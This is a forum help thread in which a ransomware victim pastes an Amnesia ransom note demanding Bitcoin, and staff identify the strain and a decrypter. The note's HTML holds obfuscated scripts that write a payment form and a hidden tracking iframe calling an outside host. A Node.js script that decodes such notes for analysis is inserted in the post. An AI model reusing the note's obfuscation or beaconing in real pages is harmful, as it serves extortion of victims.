
Ransomware file extension .02 leaves ransom note in RECOVER-FILES.HTML


  • This topic is locked
3 replies to this topic

#1 LasalPaul

LasalPaul

  • Members
  • 5 posts
  • OFFLINE
  • Local time:01:53 AM

Posted 09 May 2017 - 04:03 PM

Hi everybody

 

Yesterday I had a ransomware attack.

I don't know how it started, but I believe I clicked on the "recovery" file saved in the laptop's D drive.

After the attack the icon of the file has changed.

All my doc, jpg, gif etc. have been encrypted and saved with .02 extension.

I have attached the screenshot of the ransom note

 

Please let me know what type it is? Any tool available for recovery?

 

Thanks for the support.

 

Here is the code of the html file

 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
  <head>
    <meta charset="utf-8">

    <title></title>

  </head>

  <body>
<center>
<br><br>
    <div><h2>Your files are Encrypted!</h2></div>

    <div class="note private">

<br><br>
<div class="bold">For data recovery needs decryptor.</div>
<br>
<div>To buy the decryptor, you must pay the cost of: <font color="#FF0000"> <b>0.5</b></font> Bitcoin<br><div>
<br><br>
<script> function msjcsjwhihqeb(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexOf(search[k]);while(i>-1){subject=subject.replace(search[k],replace[k]);i=subject.indexOf(search[k],i)}}return subject} var acrkiadnudrqwb = '<nvFnvOnvRnaqMnv naqrnaqonvlnaqenv=nv"nvfnaqonvrnaqmnaq"nv nvanaqcnaqtnvinvonaqnnv=naq"nvhnaqtnvtnaqpnvsnaq:nv/naq/nvnnaq2naq2naq4naqenaqznaqvnvhnvgnaq4naqsnaqgnaqynaqanaqmnvbnv.naqonvnnaqinvonaqnnv.nvtnaqonaq/nvenaqfnvwnaqdnaqanaqqnaq.naqpnaqhnaqpnaq"nv naqmnaqenaqtnaqhnvonvdnv=nv"nvPnaqOnaqSnaqTnv"nv naqtnaqanvrnvgnvenaqtnv=naq"naq_naqbnvlnvanvnnvknaq"nv>nv';var ysyflzapqmjn = msjcsjwhihqeb('nv', '', acrkiadnudrqwb); var btxapgbxmtnfk = msjcsjwhihqeb('naq', '', ysyflzapqmjn); document.write(btxapgbxmtnfk);</script>
<INPUT TYPE="hidden" NAME="fb" VALUE="31<pre>6300606882535695776494998484220200277923817991243925842714546330534831257727049302977756496949455923
4181376328046581741544657564433824671479590311345302661986767622342033152884992186906386421939803267
2715142420698365807299062447164115573713812746405408830117753521379651894312206670730149150754136554
8111198807086644228736239939597295843286322792906824002661049384931873888612526913275962132241922724
0510907607483214223593789649051375613288036138185012292121189242047737334391576215988506839708411046
9953764416021316958391207705148048226769845110179914876342115302600090951562005807443047243419097142
25863536256536717</pre>">
<INPUT TYPE="hidden" NAME="nu" VALUE="102">
<INPUT TYPE="hidden" NAME="su" VALUE="0.5">
<button type="submit" >Buy Decryptor</button>
</form>
<br>
Free decryption as guarantee.<br>
Before paying you can send us 1 file for free decryption.<br>
To send a message or file use this form:<br>
<script type="text/javascript" src="http://assets.freshdesk.com/widget/freshwidget.js"></script>
<style type="text/css" media="screen, projection">
    @import url(http://assets.freshdesk.com/widget/freshwidget.css);
</style>
<iframe title="Feedback Form" class="freshwidget-embedded-form" id="freshwidget-embedded-form" src="https://decrypt.freshdesk.com/widgets/feedback_widget/new?&widgetType=embedded&formTitle=Message++or+File&submitTitle=SEND&submitThanks=the+message+is+received&screenshot=no&searchArea=no" scrolling="no" height="400px" width="300" frameborder="0" >
</iframe>
</center>
</div>
</center>
<script> function qxszzqudao(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexOf(search[k]);while(i>-1){subject=subject.replace(search[k],replace[k]);i=subject.indexOf(search[k],i)}}return subject} var alsfimsqwufs = '<hjepihjepfddvmrhjepahjepmhjepeddvm hjepsddvmtddvmyhjeplddvmehjep=hjep"hjepwddvmihjepdhjepthjephddvm:ddvm1hjep;hjephddvmeddvmihjepgddvmhddvmtddvm:hjep1hjep"ddvm hjepwhjepiddvmdddvmtddvmhddvm=hjep"hjep1ddvm"ddvm hjepsddvmcddvmrddvmoddvmlhjeplddvmihjepnddvmgddvm=hjep"hjepnhjepoddvm"ddvm hjepfddvmrhjepaddvmmddvmeddvmbhjepohjeprddvmdddvmeddvmrddvm=hjep"ddvmnhjepoddvm"hjep hjepmddvmaddvmrhjepgddvmiddvmnhjepwhjepihjepdhjepthjephddvm=ddvm"ddvm0ddvm"ddvm hjepmddvmaddvmrddvmgddvmiddvmnddvmhddvmehjepiddvmgddvmhhjepthjep=hjep"hjep0hjep"hjep hjepshjeprddvmcddvm=ddvm"ddvmhhjeptddvmthjeppddvm:ddvm/hjep/ddvmshjepehjeprhjepvddvm1hjep.ddvmxhjepyddvmzddvm/hjepcddvmohjepuhjepnddvmtddvmeddvmrhjep.ddvmpddvmhddvmphjep?ddvmnhjepuhjep=ddvm1ddvm0ddvm2hjep&ddvmfddvmbhjep=ddvmwhjepwhjepwddvm"hjep>hjep<ddvm/hjepiddvmfhjeprddvmahjepmddvmeddvm>ddvm';var dbikvcmyzern = qxszzqudao('hjep', '', alsfimsqwufs); var djejsvzqdbrj = qxszzqudao('ddvm', '', dbikvcmyzern); document.write(djejsvzqdbrj);</script>
</body>
</html>   


Edited by LasalPaul, 09 May 2017 - 04:06 PM.
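
The two `<script>` blocks in the note above hide their markup by interleaving junk tokens (`nv`/`naq`, then `hjep`/`ddvm`) and stripping them with a `str_replace` clone before calling `document.write`. As an added example (not part of the original post; the sample note, its tokens `qx`/`zzk` and the `.invalid` URL are constructed), this Node.js script recovers the written markup statically, without running the note's code, and lists the endpoints defanged for a report:

```javascript
// Constructed sample (not from the note): same scheme, junk tokens 'qx' and 'zzk',
// reserved .invalid domain.
const SAMPLE_NOTE = `<script> function zzf(search,replace,subject){ /* str_replace clone */ }
var a1 = '<qxfzzkorqxm azzkctiqxon="hqxttzzkps://pqxay.exzzkample.invqxalid/p.zzkphp" mqxethod="POzzkST">';
var b2 = zzf('qx', '', a1); var c3 = zzf('zzk', '', b2); document.write(c3);</script>`;

// Recover what each <script> would pass to document.write, by pattern-matching
// the source text only. The note's code is never evaluated.
function decodeNoteScripts(html) {
  const written = [];
  for (const [, body] of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const vars = new Map();
    // 1. String literals:  var name = '...';
    for (const [, name, text] of body.matchAll(/var\s+(\w+)\s*=\s*'([^']*)'\s*;/g)) {
      vars.set(name, text);
    }
    // 2. Token-stripping calls, in source order:  var out = fn('token', '', input);
    const callRe = /var\s+(\w+)\s*=\s*\w+\(\s*'([^']+)'\s*,\s*''\s*,\s*(\w+)\s*\)\s*;/g;
    for (const [, out, token, input] of body.matchAll(callRe)) {
      if (vars.has(input)) vars.set(out, vars.get(input).split(token).join(''));
    }
    // 3. Keep only values that reach document.write(name).
    for (const [, name] of body.matchAll(/document\.write\(\s*(\w+)\s*\)/g)) {
      if (vars.has(name)) written.push(vars.get(name));
    }
  }
  return written;
}

// Defang URLs so they can be pasted into tickets without becoming clickable.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

// List the form targets and embedded resources in the decoded markup.
function extractEndpoints(decodedHtml) {
  const found = [];
  for (const [, attr, url] of decodedHtml.matchAll(/\b(action|src|href)\s*=\s*"([^"]+)"/gi)) {
    found.push({ attr: attr.toLowerCase(), url: defang(url) });
  }
  return found;
}

console.log(decodeNoteScripts(SAMPLE_NOTE).flatMap(extractEndpoints));
```

Feed it a saved copy of RECOVER-FILES.HTML read as text; the note's first script writes the opening `<form>` tag and the second writes an `<iframe>`, so the form `action` and the iframe `src` are both reported.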



 


#2 Demonslay335

Demonslay335

    Ransomware Hunter


  • Security Colleague
  • 3,555 posts
  • OFFLINE
  • Gender:Male
  • Location:USA
  • Local time:06:53 PM

Posted 09 May 2017 - 04:09 PM

It's Amnesia, check the support topic here: https://www.bleepingcomputer.com/forums/t/645659/amnesia-ransomware-amnesia-how-to-recover-encrypted-filestxt-support-topic/

 

The Emsisoft decrypter can decrypt files if you have an encrypted file and its original; however, for now, it does not support decrypting the filenames, and you have to "force" decryption by changing the extensions to ".amnesia" for now. Fabian is still working out how to decrypt the filenames.




#3 LasalPaul

LasalPaul
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  • Local time:01:53 AM

Posted 09 May 2017 - 05:11 PM

Thanks for your quick reply. Let me check with the decrypter available.



#4 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,733 posts
  • OFFLINE
  • Gender:Male
  • Location:Virginia, USA
  • Local time:07:53 PM

Posted 10 May 2017 - 07:17 AM

Rather than have everyone with individual topics, it would be best (and more manageable for staff) if you posted any more questions, comments or requests for assistance in the above support topic discussion...it includes experiences by experts, a variety of IT consultants, end users and company reps who have been affected by ransomware infections. To avoid unnecessary confusion, this topic is closed.

Thanks
The BC Staff



